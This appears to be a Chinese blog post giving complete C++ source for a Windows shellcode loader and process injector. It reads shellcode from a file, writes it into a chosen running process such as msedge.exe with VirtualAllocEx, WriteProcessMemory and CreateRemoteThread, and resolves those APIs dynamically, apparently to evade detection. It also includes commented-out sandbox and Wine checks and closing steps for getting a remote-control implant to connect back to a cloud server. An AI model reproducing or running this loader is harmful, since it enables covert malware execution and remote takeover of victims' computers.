目录
#一. 代码部分:
MyFunc.h
#pragma once
#include<Windows.h>
#include <tlhelp32.h>
#include <fstream>
#include<iostream>
using namespace std;
typedef LPVOID(WINAPI* fn_VirtualAllocEx)(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
typedef HANDLE(WINAPI* fn_OpenProcess)(
_In_ DWORD dwDesiredAccess,
_In_ BOOL bInheritHandle,
_In_ DWORD dwProcessId
);
typedef LPVOID(WINAPI* fn_VirtualAlloc)(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
typedef HANDLE (WINAPI* fn_CreateThread)(
_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
_In_ SIZE_T dwStackSize,
_In_ LPTHREAD_START_ROUTINE lpStartAddress,
_In_opt_ __drv_aliasesMem LPVOID lpParameter,
_In_ DWORD dwCreationFlags,
_Out_opt_ LPDWORD lpThreadId
);
Main.Cpp
#include "myFunc.h"
//字符转宽字符
wchar_t* AtoW(char** a) {
setlocale(LC_ALL, "");
// 原始的char*字符串
char* char_str = *a;
// 确定所需的wchar_t缓冲区的大小
size_t wchar_size = mbstowcs(NULL, char_str, 0) + 1;
if (wchar_size == (size_t)-1) {
perror("mbstowcs");
return 0;
}
// 分配wchar_t缓冲区
wchar_t* wchar_str = (wchar_t*)malloc(wchar_size * sizeof(wchar_t));
if (wchar_str == NULL) {
perror("malloc");
return 0;
}
// 执行转换
mbstowcs(wchar_str, char_str, wchar_size);
return wchar_str;
}
//读取shellcode
char* ReadFile(SIZE_T* length, char* file) {
char* filename = file;
ifstream infile;
infile.open(filename, ios::out | ios::binary);
infile.seekg(0, infile.end);
*length = infile.tellg();
infile.seekg(0, infile.beg);
char* data = new char[*length];
if (infile.is_open()) {
cout << "reading from the file" << endl;
infile.read(data, *length);
}
return data;
}
//注入进程
void Inject(char* argv[]) {
SIZE_T length = 0;
char* data;
data = ReadFile(&length, argv[2]);
/*LPVOID mem = VirtualAlloc(NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, data, length);
EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);*/
HANDLE snapshot_handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //快照(留像)
if (snapshot_handle != INVALID_HANDLE_VALUE) {
// 枚举进程
PROCESSENTRY32 process_entry;
process_entry.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(snapshot_handle, &process_entry)) {
do {
// 将进程名转换为宽字符串
std::wstring extFileName(process_entry.szExeFile);
wchar_t* exename = AtoW(&argv[3]);
// 如果进程名包含 "msedge.exe" 则进行以下操作 std::string::npos == 当初遍历的进程名
if (extFileName.find(exename) != std::string::npos) {
// 打开进程
fn_OpenProcess myOpenProcess = (fn_OpenProcess)GetProcAddress(LoadLibraryA("kernel32.dll"), "OpenProcess");
HANDLE process_handle = myOpenProcess(PROCESS_ALL_ACCESS, FALSE, process_entry.th32ProcessID);
if (process_handle != NULL) {
// 在远程进程中分配内存
fn_VirtualAllocEx myVirtualAllocEx = (fn_VirtualAllocEx)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAllocEx");
LPVOID remote_buffer = myVirtualAllocEx(process_handle, NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (remote_buffer != NULL) {
SIZE_T bytes_written;
// 将 code 写入远程进程内存
if (WriteProcessMemory(process_handle, remote_buffer, data, length, &bytes_written)) {
std::cout << "Remote buffer address: " << remote_buffer << std::endl;
// 在远程进程中创建线程执行 code
HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)remote_buffer, NULL, 0, NULL);
if (remote_thread != NULL) {
// 等待线程结束
WaitForSingleObject(remote_thread, INFINITE);
CloseHandle(remote_thread);
}
}
// 关闭远程内存句柄
CloseHandle(remote_buffer);
}
// 关闭进程句柄
CloseHandle(process_handle);
}
}
} while (Process32Next(snapshot_handle, &process_entry)); // 继续枚举下一个进程
}
// 关闭进程快照句柄
CloseHandle(snapshot_handle);
}
}
//正常上线
VOID Normal(char* file) {
SIZE_T length = 0;
char* data = NULL;
data = ReadFile(&length, file);
fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");
LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);
memcpy(shell_addr, data, length);
HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);
WaitForSingleObject(HThread, -1);
}
//LPVOID == Long Point VOID
//int Check_MulDiv_1() {
// // Call MulDiv with specific arguments
// int result = MulDiv(1, 0x80000000, 0x80000000);
//
// // Check if the result matches the expected value
// if (result != 2) {
// std::cout << "MulDiv evasion method detected: Wine environment." << std::endl;
// }
// else {
// std::cout << "MulDiv evasion method not detected." << std::endl;
// }
//
// return 0;
//}
//int Check_MulDiv_2() {
// // Check for the existence of Wine's exclusive APIs
// HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
// FARPROC wineGetUnixFileName = GetProcAddress(hKernel32, "wine_get_unix_file_name");
// HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
// FARPROC wineGetHostVersion = GetProcAddress(hNtdll, "wine_get_host_version");
//
// if (wineGetUnixFileName || wineGetHostVersion) {
// std::cout << "Wine's exclusive APIs detected: Wine environment." << std::endl;
// }
// else {
// std::cout << "Wine's exclusive APIs not detected." << std::endl;
// }
//
// return 0;
//}
// 远控的上线程序会变成你的注入目标程序
// User,管理员,System
// 主函数
int main(int argc, char* argv[]) {
if (strcmp(argv[1], "-i") == 0) {
if (argc == 4) {
printf("Injecting!!!\n");
Inject(argv);
}
else {
wprintf(L"注入方式:-i 路径 进程名\n");
}
}
if (strcmp(argv[1], "-d") == 0) {
Normal(argv[2]);
};
if(strcmp(argv[1], "-h") == 0){
printf("-i Inject\n-h help\n-d normal\n");
}
/*printf("%d\n", argc);
printf("%s", argv[1]);*/
return 0;
}
#二. 具体操作
1.属性-》配置属性-》调试-》命令参数-》-i box.dll msedge.exe
2.server启动
3.将dll文件放到vs2022项目文件下运行文件
4.在云服务器上配置端口,上线成功!
420
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
